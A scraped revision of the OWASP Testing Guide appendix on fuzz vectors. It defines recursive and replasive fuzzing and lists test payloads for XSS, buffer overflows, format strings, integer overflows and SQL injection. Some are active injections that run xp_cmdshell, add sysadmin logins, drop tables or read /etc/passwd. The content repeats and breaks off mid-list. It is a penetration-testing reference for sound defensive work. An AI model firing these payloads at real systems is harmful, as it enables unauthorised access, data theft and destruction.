manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing.<br /> This is the simple part of the discovery phase.<br /> Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required.<br /> <br /> === Fuzz Categories ===<br /> <br /> In the case of stateless network protocol fuzzing (like HTTP(S)) two broad categories exist:<br /> <br /> * Recursive fuzzing<br /> * Replasive fuzzing<br /> <br /> We examine and define each category in the sub-sections that follow. <br /> <br /> ==== Recursive fuzzing ====<br /> <br /> Recursive fuzzing can be defined as the process of fuzzing a part of a request by iterating through all the possible combinations of a set alphabet. Consider the case of:<br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/8302fa3b&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> Selecting &quot;8302fa3b&quot; as a part of the request to be fuzzed against the set hexadecimal alphabet i.e. {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} falls under the category of recursive fuzzing. This would generate a total of 16^8 requests of the form:<br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/00000000&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;...&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.example.com/11000fff&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;...&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.example.com/ffffffff&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;/pre&gt;<br /> <br /> ==== Replasive fuzzing ====<br /> <br /> Replasive fuzzing can be defined as the process of fuzzing part of a request by means of replacing it with a set value. This value is known as a fuzz vector. In the case of:<br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/8302fa3b&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> Testing against Cross Site Scripting (XSS) by sending the following fuzz vectors: <br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/&gt;&quot;&gt;&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;&amp;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;http://www.example.com/'';!--&quot;&lt;XSS&gt;=&amp;{()}&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;/pre&gt;<br /> <br /> This is a form of replasive fuzzing. In this category, the total number of requests is dependant on the number of fuzz vectors specified. <br /> <br /> The remainder of this appendix presents a number of fuzz vector categories.<br /> <br /> === Cross Site Scripting (XSS) ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;&gt;&quot;&gt;&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;&amp;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&quot;&gt;&lt;STYLE&gt;@import&quot;javascript:alert('XSS')&quot;;&lt;/STYLE&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&gt;&quot;'&gt;&lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&gt;%22%27&gt;&lt;img%20src%3d%22javascript:alert(%27%20XSS%27)%22&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&gt;&quot;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'';!--&quot;&lt;XSS&gt;=&amp;{()}&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;javascript:alert('XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=javascript:alert('XSS')&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt; &lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=JaVaScRiPt:alert(&amp;amp;quot;XSS&lt;WBR&gt;&amp;amp;quot;)&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;&lt;WBR&gt;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;&lt;WBR&gt;#116;&amp;amp;#58;&amp;amp;#97;&amp;amp;#108;&amp;amp;#101;&amp;amp;&lt;WBR&gt;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83&lt;WBR&gt;;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG<br /> SRC=&amp;#0000106&amp;#0000097&amp;&lt;WBR&gt;#0000118&amp;#0000097&amp;#0000115&amp;&lt;WBR&gt;#0000099&amp;#0000114&amp;#0000105&amp;&lt;WBR&gt;#0000112&amp;#0000116&amp;#0000058&amp;&lt;WBR&gt;#0000097&amp;#0000108&amp;#0000101&amp;&lt;WBR&gt;#0000114&amp;#0000116&amp;#0000040&amp;&lt;WBR&gt;#0000039&amp;#0000088&amp;#0000083&amp;&lt;WBR&gt;#0000083&amp;#0000039&amp;#0000041&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;&lt;WBR&gt;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;&lt;WBR&gt;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;&lt;WBR&gt;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x09;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x0A;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x0D;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Buffer Overflows (BFO) ===<br /> <br /> Brief description here. <br /> <br /> Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.<br /> <br /> &lt;nowiki&gt;A x 5&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 17&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 33&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 65&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 129&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 257&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 513&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 1024&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 2049&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 4097&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 8193&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 12288&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Format String Errors (FSE) ===<br /> <br /> Brief description here.<br /> <br /> %s%p%x%d&lt;/nowiki&gt;&lt;br&gt;<br /> .1024d&lt;/nowiki&gt;&lt;br&gt;<br /> %.2049d&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%p%p%p%p&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%x%x%x%x&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%d%d%d%d&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%s%s%s%s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%99999999999s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%08x&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20d&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20n&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20x&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%s%s%s%s%s%s%s%s%s%s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%p%p%p%p%p%p%p%p%p%p&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%s x 129&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%x x 257&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Integer Overflows (INT) ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;-1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x100&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x1000&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x3fffffff&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x7ffffffe&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x7fffffff&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x80000000&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0xfffffffe&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0xffffffff&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x10000&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x100000&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Passive SQL Injection (SQP) ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;' OR 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;OR 1=1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR '1'='1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;; OR '1'='1'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+OR+%277659%27%3D%277659&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+--+&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&quot; or 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1=1 /*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;or 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 'a'='a&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&quot; or &quot;a&quot;=&quot;a&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;') or ('a'='a&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;Admin' OR '&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' having 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' having 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' group by userid having 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1 in (select @@version)--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union all select @@version--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'unusual' = 'unusual'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'something' = 'some'+'thing'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'text' = N'text'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'something' like 'some%'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 2 &gt; 1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'text' &gt; 't'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'whatever' in ('whatever')&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 2 BETWEEN 1 and 3&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or username like char(37);&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union select * from users where login = char(114,111,111,116);&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union select <br /> &lt;nowiki&gt;Password:*/=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;UNI/**/ON SEL/**/ECT&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'; EXEC ('SEL' + 'ECT US' + 'ER')&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'/**/OR/**/1/**/=/**/1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1/*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+OR+%277659%27%3D%277659&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+--+&amp;password=&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login &gt; @var select @var as var into temp end --&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' and 1 in (select var from temp)--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union select 1,load_file('/etc/passwd'),1,1,1;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' and 1=( if((load_file(char(110,46,101,120,116))&lt;&gt;char(39,39)),1,0));&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Active SQL Injection (SQI) ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;'; exec master..xp_cmdshell 'ping 10.10.1.2'--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;CRATE USER name IDENTIFIED BY 'pass123'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; &lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' ; drop table temp --&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;exec sp_addlogin 'name' , 'password'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;exec sp_addsrvrolemember 'name' , 'sysadmin'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;GRANT CONNECT TO name; GRANT RESOURCE TO name;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> <br /> <br /> <br /> {{Category:OWASP Testing Project AoC}}</div> Wisec https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&diff=13691 OWASP Testing Guide Appendix C: Fuzz Vectors 2006-11-26T10:07:10Z <p>Wisec: /* Recursive fuzzing */ replaced owasp.org with example.com</p> <hr /> <div>[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&lt;br&gt;<br /> {{Template:OWASP Testing Guide v2}}<br /> <br /> <br /> The following are fuzzing vectors which can be used with webscarab, jbrofuzz or another fuzzer.<br /> Fuzzing is the &quot;kitchen sink&quot; approach to testing the response of an application to parameter manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing.<br /> This is the simple part of the discovery phase.<br /> Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required.<br /> <br /> === Fuzz Categories ===<br /> <br /> In the case of stateless network protocol fuzzing (like HTTP(S)) two broad categories exist:<br /> <br /> * Recursive fuzzing<br /> * Replasive fuzzing<br /> <br /> We examine and define each category in the sub-sections that follow. <br /> <br /> ==== Recursive fuzzing ====<br /> <br /> Recursive fuzzing can be defined as the process of fuzzing a part of a request by iterating through all the possible combinations of a set alphabet. Consider the case of:<br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/8302fa3b&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> Selecting &quot;8302fa3b&quot; as a part of the request to be fuzzed against the set hexadecimal alphabet i.e. {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} falls under the category of recursive fuzzing. This would generate a total of 16^8 requests of the form:<br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/00000000&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;...&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.example.com/11000fff&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;...&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.example.com/ffffffff&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;/pre&gt;<br /> <br /> ==== Replasive fuzzing ====<br /> <br /> Replasive fuzzing can be defined as the process of fuzzing part of a request by means of replacing it with a set value. This value is known as a fuzz vector. In the case of:<br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.owasp.org/8302fa3b&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> Testing against Cross Site Scripting (XSS) by sending the following fuzz vectors: <br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.owasp.org/&gt;&quot;&gt;&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;&amp;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;http://www.owasp.org/'';!--&quot;&lt;XSS&gt;=&amp;{()}&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;/pre&gt;<br /> <br /> This is a form of replasive fuzzing. In this category, the total number of requests is dependant on the number of fuzz vectors specified. <br /> <br /> The remainder of this appendix presents a number of fuzz vector categories.<br /> <br /> === Cross Site Scripting (XSS) ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;&gt;&quot;&gt;&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;&amp;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&quot;&gt;&lt;STYLE&gt;@import&quot;javascript:alert('XSS')&quot;;&lt;/STYLE&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&gt;&quot;'&gt;&lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&gt;%22%27&gt;&lt;img%20src%3d%22javascript:alert(%27%20XSS%27)%22&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&gt;&quot;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'';!--&quot;&lt;XSS&gt;=&amp;{()}&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;javascript:alert('XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=javascript:alert('XSS')&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt; &lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=JaVaScRiPt:alert(&amp;amp;quot;XSS&lt;WBR&gt;&amp;amp;quot;)&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;&lt;WBR&gt;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;&lt;WBR&gt;#116;&amp;amp;#58;&amp;amp;#97;&amp;amp;#108;&amp;amp;#101;&amp;amp;&lt;WBR&gt;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83&lt;WBR&gt;;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG<br /> SRC=&amp;#0000106&amp;#0000097&amp;&lt;WBR&gt;#0000118&amp;#0000097&amp;#0000115&amp;&lt;WBR&gt;#0000099&amp;#0000114&amp;#0000105&amp;&lt;WBR&gt;#0000112&amp;#0000116&amp;#0000058&amp;&lt;WBR&gt;#0000097&amp;#0000108&amp;#0000101&amp;&lt;WBR&gt;#0000114&amp;#0000116&amp;#0000040&amp;&lt;WBR&gt;#0000039&amp;#0000088&amp;#0000083&amp;&lt;WBR&gt;#0000083&amp;#0000039&amp;#0000041&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;&lt;WBR&gt;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;&lt;WBR&gt;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;&lt;WBR&gt;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x09;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x0A;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x0D;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Buffer Overflows (BFO) ===<br /> <br /> Brief description here. <br /> <br /> Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.<br /> <br /> &lt;nowiki&gt;A x 5&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 17&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 33&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 65&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 129&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 257&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 513&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 1024&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 2049&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 4097&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 8193&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 12288&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Format String Errors (FSE) ===<br /> <br /> Brief description here.<br /> <br /> %s%p%x%d&lt;/nowiki&gt;&lt;br&gt;<br /> .1024d&lt;/nowiki&gt;&lt;br&gt;<br /> %.2049d&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%p%p%p%p&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%x%x%x%x&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%d%d%d%d&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%s%s%s%s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%99999999999s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%08x&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20d&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20n&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20x&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%s%s%s%s%s%s%s%s%s%s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%p%p%p%p%p%p%p%p%p%p&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%s x 129&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%x x 257&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Integer Overflows (INT) ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;-1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x100&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x1000&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x3fffffff&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x7ffffffe&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x7fffffff&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x80000000&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0xfffffffe&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0xffffffff&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x10000&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x100000&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Passive SQL Injection (SQP) ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;' OR 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;OR 1=1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR '1'='1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;; OR '1'='1'&lt;/nowiki&gt;&lt;br&gt;<br /> 